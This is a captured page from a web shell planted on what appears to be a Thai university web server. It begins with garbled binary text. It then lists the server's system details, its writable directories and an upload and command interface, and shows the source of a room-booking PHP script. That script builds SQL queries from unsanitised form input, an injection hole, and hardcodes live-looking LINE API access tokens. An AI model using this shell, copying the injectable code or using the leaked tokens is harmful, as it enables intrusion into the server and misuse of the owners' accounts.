h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/trr/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/trr/pages/reserve_add_db.php
<?ob_start();?>
<?php session_start();?>
<?php include 'check_mode_login.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit"])
{
  $room_code = (isset($_POST["room_code"])) ? $_POST["room_code"] : '';
  $reserve_date = (isset($_POST["reserve_date"])) ? $_POST["reserve_date"] : '';
  //$dayofweek = date('w', strtotime($reserve_date));
  //if (($dayofweek<>6) && ($dayofweek<>0)) {	
	//$prefix_id = (isset($_POST["prefix_id"])) ? $_POST["prefix_id"] : '';
	//$firstname = (isset($_POST["firstname"])) ? $_POST["firstname"] : '';
	//$lastname = (isset($_POST["lastname"])) ? $_POST["lastname"] : '';
	//$faculty_id = (isset($_POST["faculty_id"])) ? $_POST["faculty_id"] : '';
	$phone = (isset($_POST["phone"])) ? $_POST["phone"] : '';
	//$email = (isset($_POST["email"])) ? $_POST["email"] : '';
	$subject = (isset($_POST["subject"])) ? $_POST["subject"] : '';
	//$num_student = (isset($_POST["num_student"])) ? $_POST["num_student"] : 1;
	$note = (isset($_POST["note"])) ? $_POST["note"] : '';
	//$password = (isset($_POST["password"])) ? $_POST["password"] : '';
	/*if (!is_numeric($_POST["num_student"])) {
		$num_student = 0;	
	} else { //if (!is_numeric($_POST["num_student"])) {
		$num_student = $_POST["num_student"];
	} //if (!is_numeric($_POST["num_student"])) {*/

	//if (($room_code<>"") && ($reserve_date<>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty_id<>"") && ($phone<>"") && ($email<>"") && ($password<>"") )
	if (($room_code<>"") && ($reserve_date<>""))
	{
	  //ตรวจสอบว่าเลือกเวลาแล้วยัง
	  $select_time_ok = 0;
	  $sql = "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC";
	  $query = mysqli_query($conn,$sql);	
	  while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
	   $input_name = "pid" . $result["time_code"];
	   if (isset($_POST[$input_name])) {
	   	$select_time_ok = 1;
		break;
	   } //if (isset($_POST[$input_name])) {
	  }	//while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
	  if ($select_time_ok == 1) {
			//หา reserve_code
			$sql = "SELECT reserve_code FROM reserve_detail ORDER BY reserve_code DESC";
			$query = mysqli_query($conn,$sql);	
			if($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
				$new_reserve_code=$result["reserve_code"]+1;		
			} else {  //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
				$new_reserve_code=1;
			} //if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
			
			//บันทึกลงในตาราง reserve_detail
			$sql = "INSERT INTO reserve_detail ";
			$sql .="(reserve_code,user_name,full_name,faculty_name,phone,email,room_code,reserve_date,subject,note) ";
			$sql .="VALUES ";
			$sql .="(". $new_reserve_code . " ";
			$sql .=",'" . $_SESSION['USERNAME_arit67'] . "' ";	
			$sql .=",'" . $_SESSION['FULLNAME'] . "' ";
			$sql .=",'" . $_SESSION['FACULTYNAME'] . "' ";
			$sql .=",'" . $phone . "' ";
			$sql .=",'" . $_SESSION['MAIL'] . "' ";
			$sql .="," . $room_code . " ";
			$sql .=",'" . $reserve_date . "' ";
			$sql .=",'" . $subject . "' ";
			//$sql .="," . $num_student . " ";
			$sql .=",'" . $note . "') ";
			
			$query = mysqli_query($conn,$sql);
			
			if($query)
			{
				//บันทึกลงในตาราง reserve_time
				$sql = "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC";
				$query = mysqli_query($conn,$sql);	
				while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
					$input_name = "pid" . $result["time_code"];
					if (isset($_POST[$input_name])) {
						$sql2 = "INSERT INTO reserve_time ";
						$sql2 .="(reserve_code,reserve_time) ";
						$sql2 .="VALUES ";
						$sql2 .="(". $new_reserve_code . " ";
						$sql2 .="," . $_POST[$input_name] . ") ";
						$query2 = mysqli_query($conn,$sql2);
						if (!$query2) {
							echo "ไม่สามารถบันทึกข้อมูลได้";
						} //if (!$query2) {
					} //if (isset($_POST[$input_name])) {
				} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {	
				
				
				/*//ส่ง line
				//ini_set('display_errors', 1);
				//ini_set('display_startup_errors', 1);
				//error_reporting(E_ALL);
				date_default_timezone_set("Asia/Bangkok");
			
				$sToken = "dJQlmlmg77mO7iHhiQEkpwl69HNdy9DqV2OQnPOahni";
				$sMessage = "\nเลขที่การจอง : " . $new_reserve_code  ;
				$sMessage .= "\nผู้จอง : " . $_SESSION['FULLNAME']  ;
				$sMessage .= "\nhttps://arit.skru.ac.th/trr/";
			
				
				$chOne = curl_init(); 
				curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify"); 
				curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0); 
				curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0); 
				curl_setopt( $chOne, CURLOPT_POST, 1); 
				curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message=".$sMessage); 
				$headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$sToken.'', );
				curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers); 
				curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1); 
				$result = curl_exec( $chOne ); 
			
				//Result error 
				if(curl_error($chOne)) 
				{ 
					echo 'error:' . curl_error($chOne); 
				} 
				else { 
					$result_ = json_decode($result, true); 
					//echo "status : ".$result_['status']; echo "message : ". $result_['message'];
				} 
				curl_close( $chOne );   
				//จบส่ง line*/

				//ส่ง line messenger api
				// Channel Access Token ของคุณ
				$access_token = 'Jo+c8sYp66+UZSzu9C9dpOgLOeaKbMNxTw+qMsORcM9mFg5tW3Be5W6jf1Gwreo3rJY2aawub8Uu9cf1Git5cUHckqbkysYzRi1mF+XJQr10v1Cmfs/9thq8UaYxTSYHPTcraeIKQYCnY5AugknSpwdB04t89/1O/w1cDnyilFU='; //ARIT-OA3
				
				// ใส่ ID ของผู้รับ
				$to = 'C94a1fecfd0f485a363a2f945d3061c6c'; //ID ของกลุ่มจองห้องค้นคว้าสำหรับอาจารย์
				
				// ข้อความที่คุณต้องการส่ง
				//$message = 'Hello, this is a message from LINE API!';
				$message = "\nเลขที่การจอง : " . $new_reserve_code  ;
				$message .= "\nผู้จอง : " . $_SESSION['FULLNAME']  ;
				$message .= "\nhttps://arit.skru.ac.th/trr/";											
				
				// URL ของ LINE Messaging API
				$url = 'https://api.line.me/v2/bot/message/push';
				
				// ข้อมูลที่ส่งไปใน API
				$data = [
					'to' => $to,
					'messages' => [
						[
							'type' => 'text',
							'text' => $message
						]
					]
				];
				
				// เรียกใช้ cURL เพื่อส่งข้อมูล
				$headers = [
					'Content-Type: application/json',
					'Authorization: Bearer ' . $access_token
				];
				
				$ch = curl_init($url);
				curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
				curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
				curl_setopt($ch, CURLOPT_POST, true);
				curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
				
				$response = curl_exec($ch);
				curl_close($ch);
				
				// แสดงผลลัพธ์ที่ได้จากการส่งข้อความ
				//echo $response;
				//จบส่ง line messenger api						
									
				
?>							
	<BR />บันทึกข้อมูลเรียบร้อยแล้ว
	<BR /><BR /><a href="index.php#<?php echo $room_code;?>"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการจอง</button></a>
<?php				
				//echo "บันทึกข้อมูลแล้ว";
				//$redirect_url = "show_agpublish.php?ap_id=" . $new_ap_id;
				//header("location:$redirect_url");
			}
			else
			{
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}	
	  } else { //if ($select_time_ok == 1) {
?>
	<BR />กรุณาเลือกการช่วงเวลาที่ต้องการจอง
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php	  
	  } //if ($select_time_ok == 1) {
	} else { //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
?>	
	<BR />กรุณากรอกข้อมูลให้ครบถ้วน
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php
	}  //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
   /*} else { //if (($dayofweek<>6) && ($dayofweek<>0)) {
?>	
	<BR /><font color="red">ห้องประชุมกลุ่มย่อยเปิดให้บริการวันจันทร์-ศุกร์ งดจองห้องประชุมกลุ่มย่อยในวันเสาร์และอาทิตย์</font>
	<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
<?php	

   } // if (($dayofweek<>6) && ($dayofweek<>0)) {*/
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit